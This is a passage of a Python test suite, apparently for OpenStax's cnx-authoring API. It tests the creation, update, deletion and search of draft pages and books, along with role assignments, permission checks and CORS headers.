contained_ids = [id for id in flattener]
self.assertIn(u'e79ffde3-7fb4-4af3-9ec8-df648b391597@draft',
contained_ids)
self.assertIn(u'56f1c5c1-4014-450d-a477-2121e276beca@8',
contained_ids)
# FIXME the user info we have in archive differs from
# that here in authoring.
osc_user_info = {
u'firstname': u'Test',
u'fullname': u'Test User',
u'id': u'OpenStaxCollege',
u'surname': u'User',
u'type': u'cnx-id',
}
osc_role = osc_user_info.copy()
osc_role.update({
u'assignmentDate': formatted_now,
u'hasAccepted': True,
u'firstname': u'OpenStax College',
u'fullname': u'OpenStax College',
u'requester': u'OpenStaxCollege',
u'surname': None,
})
cnxcap_role = {
u'assignmentDate': formatted_now,
u'firstname': u'College',
u'fullname': u'OSC Physics Maintainer',
u'hasAccepted': True,
u'id': u'cnxcap',
u'requester': u'OpenStaxCollege',
u'surname': u'Physics',
u'type': u'cnx-id',
}
rice_role = {
u'assignmentDate': formatted_now,
u'firstname': u'Rice',
u'fullname': u'Rice University',
u'hasAccepted': True,
u'id': u'OSCRiceUniversity',
u'requester': u'OpenStaxCollege',
u'surname': u'University',
u'type': u'cnx-id',
}
expected = {
u'areContainedPublishable': False,
u'authors': [osc_role],
u'cnx-archive-uri': post_data['id'],
u'containedIn': [],
u'content': u'',
u'copyrightHolders': [rice_role],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'editors': [],
u'id': post_data['id'].split('@')[0],
u'illustrators': [],
u'isPublishable': True,
u'publishBlockers': None,
u'language': u'en',
u'licensors': [rice_role],
u'mediaType': u'application/vnd.org.cnx.collection',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'publishers': [osc_role, cnxcap_role],
u'state': u'Draft',
u'subjects': [
u'Mathematics and Statistics',
u'Science and Technology',
u'OpenStax Featured'],
u'submitter': osc_user_info,
u'title': u'College Physics',
u'translators': [],
u'version': u'draft',
u'printStyle': None,
}
self.assertEqual(result, expected)
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(result['id']), status=200)
result = response.json
license = result.pop('license')
self.assertEqual(license['url'], DEFAULT_LICENSE.url)
original_license = result.pop('originalLicense')
self.assertEqual(original_license['url'], DEFAULT_LICENSE.url)
created = result.pop('created')
self.assertTrue(created.startswith('2013-07-31'))
revised = result.pop('revised')
self.assertEqual(revised, formatted_now)
abstract = result.pop('abstract')
self.assertTrue('two-semester college physics book' in abstract)
keywords = result.pop('keywords')
self.assertIn('drag', keywords)
# Test the tree for contents.
tree = result.pop('tree')
flattener = cnxepub.flatten_tree_to_ident_hashes(tree)
contained_ids = [id for id in flattener]
self.assertIn(u'e79ffde3-7fb4-4af3-9ec8-df648b391597@draft',
contained_ids)
self.assertIn(u'56f1c5c1-4014-450d-a477-2121e276beca@8',
contained_ids)
self.assertEqual(result, expected)
self.assert_cors_headers(response)
def test_post_content(self):
post_data = {
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'created': u'2014-03-13T15:21:15.677617',
'revised': u'2014-03-13T15:21:15.677617',
'license': {'url': DEFAULT_LICENSE.url},
'language': u'en',
'content': u"Ding dong the switch is flipped.",
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
'editors': [SUBMITTER],
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
license = result.pop('license')
self.assertEqual(license['url'], post_data['license']['url'])
original_license = result.pop('originalLicense')
self.assertEqual(original_license['url'], post_data['license']['url'])
created = result.pop('created')
self.assertTrue(created.startswith('2014-03-13T15:21:15.677617'))
revised = result.pop('revised')
self.assertTrue(revised.startswith('2014-03-13T15:21:15.677617'))
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': result['id'],
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'title': post_data['title'],
u'abstract': post_data['abstract'],
u'language': post_data['language'],
u'containedIn': [],
u'content': post_data['content'],
u'mediaType': u'application/vnd.org.cnx.module',
u'version': u'draft',
u'subjects': post_data['subjects'],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': post_data['keywords'],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'editors': [submitter_w_assign_date],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
def test_post_content_binder(self):
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents',
{'title': 'Page one'}, status=201)
page1 = response.json
self.assert_cors_headers(response)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json(
'/users/contents',
{'title': 'Page two'}, status=201)
page2 = response.json
self.assert_cors_headers(response)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.post_json('/users/contents', {
'title': 'Book',
'abstract': 'Book abstract',
'language': 'de',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page1['id']),
'title': 'Page one',
},
{
'id': 'subcol',
'title': 'New section',
'contents': [
{
'id': '{}@draft'.format(page2['id']),
'title': 'Page two',
},
],
},
],
},
}, status=201)
book = response.json
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(book['id']), status=200)
result = response.json
self.assertTrue(result.pop('created') is not None)
self.assertTrue(result.pop('revised') is not None)
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date['assignmentDate'] = now.astimezone(
TZINFO).isoformat()
self.assertEqual(result, {
u'id': book['id'],
u'title': u'Book',
u'abstract': u'Book abstract',
u'areContainedPublishable': False,
u'containedIn': [],
u'content': u'',
u'mediaType': u'application/vnd.org.cnx.collection',
u'derivedFrom': None,
u'derivedFromTitle': None,
u'derivedFromUri': None,
u'language': u'de',
u'version': u'draft',
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'tree': {
u'id': u'{}@draft'.format(book['id']),
u'title': u'Book',
u'isPublishable': True,
u'publishBlockers': None,
u'contents': [
{
u'id': u'{}@draft'.format(page1['id']),
u'title': u'Page one',
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
},
{
u'id': u'subcol',
u'title': u'New section',
u'contents': [
{
u'id': u'{}@draft'.format(page2['id']),
u'title': u'Page two',
u'isPublishable': False,
u'publishBlockers': [u'no_content'],
},
],
},
],
},
u'subjects': [],
u'isPublishable': True,
u'publishBlockers': None,
u'keywords': [],
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
def test_put_content_401(self):
self.logout()
response = self.testapp.put_json(
'/contents/1234abcde@draft.json', {}, status=401)
self.assert_cors_headers(response)
def test_put_content_not_found(self):
response = self.testapp.put_json(
'/contents/1234abcde@draft.json',
{'title': u'Update document title'}, status=404)
self.assert_cors_headers(response)
def test_put_content_403(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My document タイトル',
'abstract': u'My document abstract',
'language': u'en'}, status=201)
document = response.json
with mock.patch('cnxauthoring.models.Document.__acl__') as acl:
acl.return_value = ()
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(document['id']),
{'title': 'new title'}, status=403)
self.assertTrue('You do not have permission to edit'
in response.body.decode('utf-8'))
response = self.testapp.post_json('/users/contents', {
'title': u'My binder タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
'language': u'en'}, status=201)
binder = response.json
with mock.patch('cnxauthoring.models.Binder.__acl__') as acl:
acl.return_value = ()
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(binder['id']),
{'title': 'new title'}, status=403)
self.assertTrue('You do not have permission to edit'
in response.body.decode('utf-8'))
def test_put_content_invalid_json(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My document タイトル',
'abstract': u'My document abstract',
'language': u'en'}, status=201)
document = response.json
self.assert_cors_headers(response)
response = self.testapp.put(
'/contents/{}@draft.json'.format(document['id']),
'invalid json', content_type='application/json', status=400)
self.assertTrue('Invalid JSON' in response.body.decode('utf-8'))
self.assert_cors_headers(response)
def test_put_content_derived_from(self):
post_data = {
'derivedFrom': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
self.assert_cors_headers(response)
post_data = {
'content': '<html><body><p>Page content</p></body></html>',
}
now = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
post_data, status=200)
result = response.json
self.assertEqual(result['content'], post_data['content'])
self.assertEqual(result['revised'], now.astimezone(TZINFO).isoformat())
self.assert_cors_headers(response)
def test_put_content_binder_document_not_found(self):
response = self.testapp.post_json('/users/contents', {
'title': u'My book タイトル',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=201)
self.assert_cors_headers(response)
binder = response.json
update_data = {
'title': u'...',
'tree': {
'contents': [{
u'id': u'7d089006-5a95-4e24-8e04-8168b5c41aa3@draft',
u'title': u'Hygiene',
}],
},
}
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(binder['id']),
update_data, status=400)
self.assertTrue(
'Document Not Found: 7d089006-5a95-4e24-8e04-8168b5c41aa3@draft'
in response.body.decode('utf-8'))
def test_put_content_binder(self):
# Create a derived binder
post_data = {
'derivedFrom': u'a733d0d2-de9b-43f9-8aa9-f0895036899e@1.1',
}
created = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = created
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
binder = response.json
self.assert_cors_headers(response)
update_data = {
'title': u'...',
'abstract': u'...',
'tree': {
'contents': [{
u'id': u'7d089006-5a95-4e24-8e04-8168b5c41aa3@1',
u'title': u'Hygiene',
}],
},
}
revised = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = revised
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(binder['id']),
update_data, status=200)
binder = response.json
submitter_w_assign_date = SUBMITTER_WITH_ACCEPTANCE.copy()
submitter_w_assign_date[u'assignmentDate'] = unicode(
created.astimezone(TZINFO).isoformat())
self.assertEqual(binder, {
u'areContainedPublishable': False,
u'created': unicode(created.astimezone(TZINFO).isoformat()),
u'revised': unicode(revised.astimezone(TZINFO).isoformat()),
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': binder['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'<span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'abstract': u'...',
u'containedIn': [],
u'content': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.collection',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'title': u'...',
u'tree': {
u'id': u'{}@draft'.format(binder['id']),
u'title': u'...',
u'isPublishable': True,
u'publishBlockers': None,
u'contents': [{
u'id': u'7d089006-5a95-4e24-8e04-8168b5c41aa3@1',
u'title': u'Hygiene',
}],
},
u'subjects': [],
u'keywords': [],
u'isPublishable': True,
u'publishBlockers': None,
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(binder['id']), status=200)
binder = response.json
self.assertEqual(binder, {
u'areContainedPublishable': False,
u'created': created.astimezone(TZINFO).isoformat(),
u'revised': revised.astimezone(TZINFO).isoformat(),
u'submitter': SUBMITTER,
u'authors': [submitter_w_assign_date],
u'permissions': [u'edit', u'publish', u'view'],
u'publishers': [submitter_w_assign_date],
u'id': binder['id'],
u'derivedFrom': post_data['derivedFrom'],
u'derivedFromTitle': u'<span style="color:red;">Derived</span> Copy of College <i>Physics</i>',
u'derivedFromUri': u'http://cnx.org/contents/{}'.format(
post_data['derivedFrom']),
u'abstract': u'...',
u'containedIn': [],
u'content': u'',
u'language': u'en',
u'mediaType': u'application/vnd.org.cnx.collection',
u'version': u'draft',
u'license': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0'},
u'originalLicense': {
u'code': u'by',
u'name': u'Creative Commons Attribution License',
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'version': u'4.0',
},
u'title': u'...',
u'tree': {
u'id': u'{}@draft'.format(binder['id']),
u'title': u'...',
u'isPublishable': True,
u'publishBlockers': None,
u'contents': [{
u'id': u'7d089006-5a95-4e24-8e04-8168b5c41aa3@1',
u'title': u'Hygiene',
}],
},
u'subjects': [],
u'keywords': [],
u'isPublishable': True,
u'publishBlockers': None,
u'state': u'Draft',
u'permissions': [u'edit', u'publish', u'view'],
u'publication': None,
u'editors': [],
u'translators': [],
u'licensors': [submitter_w_assign_date],
u'copyrightHolders': [submitter_w_assign_date],
u'illustrators': [],
u'printStyle': None,
})
self.assert_cors_headers(response)
def test_put_content_binder2(self):
response = self.testapp.post_json('/users/contents', {
'title': 'Empty book',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [],
},
}, status=201)
binder = response.json
created = binder['created']
response = self.testapp.post_json(
'/users/contents', {'title': 'Empty page'}, status=201)
page = response.json
revised = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = revised
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(binder['id']), {
'id': '{}@draft'.format(binder['id']),
'downloads': [],
'isLatest': True,
'derivedFrom': None,
'abstract': '',
'revised': '2014-05-02T12:42:09.490860-04:00',
'keywords': [],
'subjects': [],
'publication': None,
'license': {
'url': 'http://creativecommons.org/licenses/by/4.0/',
'version': '4.0',
'name': 'Creative Commons Attribution License',
'abbr': 'by'
},
'language': 'en',
'title': 'etst book',
'created': '2014-05-02T12:42:09.490738-04:00',
'tree': {
'id': '{}@draft'.format(binder['id']),
'title': 'etst book',
'contents': [
{'id': 'f309a0f9-63fb-46ca-9585-d1e1dc96a142@3',
'title':
'Introduction to Two-Dimensional Kinematics'},
{'id': 'e12329e4-8d6c-49cf-aa45-6a05b26ebcba@2',
'title':
'Introduction to One-Dimensional Kinematics'},
{'id': '{}@draft'.format(page['id']),
'title': 'test page'}
]
},
'mediaType': 'application/vnd.org.cnx.collection',
'content': '',
'state': 'Draft',
'version': 'draft',
'submitter': SUBMITTER,
'authors': [SUBMITTER_WITH_ACCEPTANCE],
'publishers': [SUBMITTER_WITH_ACCEPTANCE],
'error': False,
}, status=200)
response = self.testapp.get(
'/contents/{}@draft.json'.format(binder['id']), status=200)
result = response.json
self.assertEqual(result['created'], created)
self.assertEqual(
result['revised'], revised.astimezone(TZINFO).isoformat())
self.assertEqual(result['tree'], {
'id': '{}@draft'.format(binder['id']),
'title': 'etst book',
'isPublishable': True,
'publishBlockers': None,
'contents': [
{
'id': 'f309a0f9-63fb-46ca-9585-d1e1dc96a142@3',
'title': 'Introduction to Two-Dimensional Kinematics'
},
{
'id': 'e12329e4-8d6c-49cf-aa45-6a05b26ebcba@2',
'title': 'Introduction to One-Dimensional Kinematics'
},
{
'id': '{}@draft'.format(page['id']),
'title': 'test page',
'isPublishable': False,
'publishBlockers': ['no_content'],
}
]
})
def test_put_content(self):
created = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = created
response = self.testapp.post_json('/users/contents', {
'title': u'My document タイトル',
'abstract': u'My document abstract',
'language': u'en'}, status=201)
document = response.json
self.assert_cors_headers(response)
update_data = {
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'content': u"Ding dong the switch is flipped.",
'keywords': ['DNA', 'resonance'],
'subjects': ['Science and Technology'],
}
revised = datetime.datetime.now(TZINFO)
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = revised
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(document['id']),
update_data, status=200)
result = response.json
self.assertEqual(result['id'], document['id'])
self.assertEqual(result['title'], update_data['title'])
self.assertEqual(result['abstract'], update_data['abstract'])
self.assertEqual(result['language'], document['language'])
self.assertEqual(result['content'], update_data['content'])
self.assertEqual(result['keywords'], update_data['keywords'])
self.assertEqual(result['subjects'], update_data['subjects'])
self.assertEqual(result['created'],
created.astimezone(TZINFO).isoformat())
self.assertEqual(result['revised'],
revised.astimezone(TZINFO).isoformat())
response = self.testapp.get(
'/contents/{}@draft.json'.format(document['id']))
result = response.json
self.assertEqual(result['id'], document['id'])
self.assertEqual(result['title'], update_data['title'])
self.assertEqual(result['abstract'], update_data['abstract'])
self.assertEqual(result['language'], document['language'])
self.assertEqual(result['content'], update_data['content'])
self.assertEqual(result['keywords'], update_data['keywords'])
self.assertEqual(result['subjects'], update_data['subjects'])
self.assertEqual(result['created'],
created.astimezone(TZINFO).isoformat())
self.assertEqual(result['revised'],
revised.astimezone(TZINFO).isoformat())
self.assert_cors_headers(response)
def test_delete_content_401(self):
self.logout()
response = self.testapp.delete('/contents/{}@draft'.format(id),
status=401)
self.assert_cors_headers(response)
def test_delete_content_403(self):
response = self.testapp.post_json(
'/users/contents', {'title': 'My page'}, status=201)
page = response.json
self.assert_cors_headers(response)
self.logout()
self.login('you')
response = self.testapp.delete(
'/contents/{}@draft'.format(page['id']), status=403)
self.assert_cors_headers(response)
def test_delete_content(self):
response = self.testapp.post_json(
'/users/contents', {'title': 'My page'}, status=201)
page = response.json
self.assert_cors_headers(response)
# test that it's possible to get the content we just created
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# delete the content
response = self.testapp.delete(
'/contents/{}@draft'.format(page['id']), status=200)
self.assert_cors_headers(response)
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=404)
def test_delete_content_multiple(self):
# create two pages
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'editors': [{'id': 'user2'}]}, status=201)
page_one = response.json
response = self.testapp.post_json('/users/contents', {
'title': 'Page two'}, status=201)
page_two = response.json
# create a book, put the two pages inside the book, plus
# one page from archive
response = self.testapp.post_json('/users/contents', {
'title': 'My book',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{'id': '{}@draft'.format(page_one['id']),
'title': 'Page one'},
{'id': '{}@draft'.format(page_two['id']),
'title': 'Page two'},
{'id': '91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
'title': 'Page three'}],
},
}, status=201)
book = response.json
# login as user2
self.logout()
self.login('user2')
# create another book, put only page one in it
response = self.testapp.post_json('/users/contents', {
'title': "User2's book",
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{'id': '{}@draft'.format(page_one['id']),
'title': 'Page one'}],
},
}, status=201)
# log back in as user1
self.logout()
self.login('user1')
# delete the book and all the pages inside it
response = self.testapp.put_json('/contents/delete', [
book['id'], page_one['id'], page_two['id'],
'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
], status=200)
# only the book and page_two should be deleted
deleted = response.json
self.assertEqual(deleted, [book['id'], page_two['id']])
self.testapp.get('/contents/{}@draft.json'.format(book['id']),
status=404)
self.testapp.get('/contents/{}@draft.json'.format(page_one['id']),
status=200)
self.testapp.get('/contents/{}@draft.json'.format(page_two['id']),
status=404)
@mock.patch('cnxauthoring.views.logger')
def test_delete_content_w_publish_error(self, logger):
# Start test similar to test for multiple users
response = self.testapp.post_json('/users/contents', {
'title': 'Multiple users test',
'editors': [{'id': 'you'}],
}, status=201)
page = response.json
self.assert_cors_headers(response)
self.testapp.get('/contents/{}@draft.json'.format(page['id']),
status=200)
self.logout()
self.login('you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
self.testapp.put_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'editors', 'hasAccepted': True}]},
status=200)
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'title': 'Multiple users test edited by you'}, status=200)
self.logout()
self.login('user2')
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=403)
self.logout()
self.login('user1')
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
self.assertEqual(response.json['title'],
'Multiple users test edited by you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
self.testapp.delete('/contents/{}@draft'.format(page['id']),
status=403)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# Delete the contents of the page completely from archive's database
with psycopg2.connect(
publishing_settings()['db-connection-string']) as db_conn:
with db_conn.cursor() as cursor:
cursor.execute(
"""DELETE FROM document_acl \
WHERE uuid = %s""", (page['id'],))
cursor.execute(
"""DELETE FROM license_acceptances \
WHERE uuid = %s""", (page['id'],))
cursor.execute(
"""DELETE FROM modules \
WHERE uuid = %s""", (page['id'],))
cursor.execute(
"""DELETE FROM role_acceptances \
WHERE uuid = %s""", (page['id'],))
cursor.execute(
"""DELETE FROM document_controls \
WHERE uuid = %s""", (page['id'],))
# Send a delete request to authoring to remove the page from its
# database
self.testapp.delete(
'/contents/{}@draft/users/me'.format(page['id']), status=200)
# Check to see that authoring created a warning message when publishing
# failed to find the page.
self.assertEqual(logger.exception.call_count, 1)
args1, = logger.exception.call_args_list
self.assertEqual(
args1[0], ('Warning: '
'publishing error on '
'content id {} '.format(page['id']),))
# Make sure user can no longer access the page
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=403)
# Finish the test by making sure the requests sent by
# uses are uneffected by the publishing warning.
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), items)
self.logout()
self.login('you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'title': 'Multiple users test edited again by you'}, status=200)
self.logout()
self.login('user1')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), items)
post_data = {
'id': '{}@draft'.format(page['id']),
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
def test_delete_content_binder(self):
# Create a page first
response = self.testapp.post_json('/users/contents', {
'title': 'My page',
}, status=201)
page = response.json
self.assert_cors_headers(response)
# Create a book with the page inside
response = self.testapp.post_json('/users/contents', {
'title': 'My book',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page['id']),
'title': 'My page',
},
],
},
}, status=201)
book_one = response.json
self.assert_cors_headers(response)
# Create another book with the same page inside
response = self.testapp.post_json('/users/contents', {
'title': 'My different book',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': '{}@draft'.format(page['id']),
'title': 'My page',
},
],
},
}, status=201)
book_two = response.json
self.assert_cors_headers(response)
# Assert that the page is contained in two books
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
result = response.json
self.assertEqual(sorted(result['containedIn']),
sorted([book_one['id'], book_two['id']]))
# Delete book one
self.testapp.delete('/contents/{}@draft'.format(book_one['id']),
status=200)
self.testapp.get('/contents/{}@draft.json'.format(book_one['id']),
status=404)
# Assert that the page is now only contained in book two
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
result = response.json
self.assertEqual(result['containedIn'], [book_two['id']])
def test_delete_content_multiple_users(self):
response = self.testapp.post_json('/users/contents', {
'title': 'Multiple users test',
'editors': [{'id': 'you'}],
}, status=201)
page = response.json
self.assert_cors_headers(response)
self.testapp.get('/contents/{}@draft.json'.format(page['id']),
status=200)
self.logout()
self.login('you')
# editor should get the content in their workspace
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
# make sure the editor can also view the content
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# make sure the editor can also edit the content after accepting their
# role
self.testapp.put_json(
'/contents/{}@draft/acceptance'.format(page['id']),
{'license': True,
'roles': [{'role': 'editors', 'hasAccepted': True}]},
status=200)
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'title': 'Multiple users test edited by you'}, status=200)
self.logout()
self.login('user2')
# someone not in acl should not be able to view the content
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=403)
self.logout()
# log back in as the submitter and check that the title has been
# changed
self.login('user1')
response = self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
self.assertEqual(response.json['title'],
'Multiple users test edited by you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
# try to delete the content should return an error
self.testapp.delete('/contents/{}@draft'.format(page['id']),
status=403)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
# delete user1 from the content
self.testapp.delete(
'/contents/{}@draft/users/me'.format(page['id']), status=200)
# content should not appear in user1's workspace
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), items)
self.logout()
# content should still be accessible by "you"
self.login('you')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']), status=200)
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']),
{'title': 'Multiple users test edited again by you'}, status=200)
self.logout()
# content should not appear in user1's workspace
self.login('user1')
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertNotIn('{}@draft'.format(page['id']), items)
# re-add user1 to the document
post_data = {
'id': '{}@draft'.format(page['id']),
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
response = self.testapp.get('/users/contents', status=200)
workspace = response.json
items = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), items)
def test_search_content_401(self):
self.logout()
response = self.testapp.get('/users/contents/search', status=401)
self.assert_cors_headers(response)
def test_search_content_no_q(self):
response = self.testapp.get('/users/contents/search', status=200)
result = response.json
self.assertEqual(result, {
'query': {'limits': []},
'results': {
'items': [],
'total': 0,
'limits': [],
}
})
self.assert_cors_headers(response)
def test_search_content_q_empty(self):
response = self.testapp.get('/users/contents/search?q=', status=200)
result = response.json
self.assertEqual(result, {
'query': {'limits': []},
'results': {
'items': [],
'total': 0,
'limits': [],
}
})
self.assert_cors_headers(response)
def test_search_unbalanced_quotes(self):
self.logout()
self.login('user2')
post_data = {'title': u'Document'}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
self.assert_cors_headers(response)
response = self.testapp.get('/users/contents/search?q="Document', status=200)
result = response.json
self.assertEqual(result['query']['limits'],
[{'tag': 'text', 'value': 'Document'}])
self.assertEqual(result['results']['total'], 1)
self.assert_cors_headers(response)
def test_search_content(self):
post_data = {'title': u"Document"}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
self.logout()
self.login('user2')
post_data = {
'title': u"Turning DNA through resonance",
'abstract': u"Theories on turning DNA structures",
'created': u'2014-03-13T15:21:15.677617',
'revised': u'2014-03-13T15:21:15.677617',
'license': {'url': DEFAULT_LICENSE.url},
'language': u'en',
'contents': u"Ding dong the switch is flipped.",
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
result = response.json
doc_id = result['id']
self.assert_cors_headers(response)
post_data = {'title': u'New stuff'}
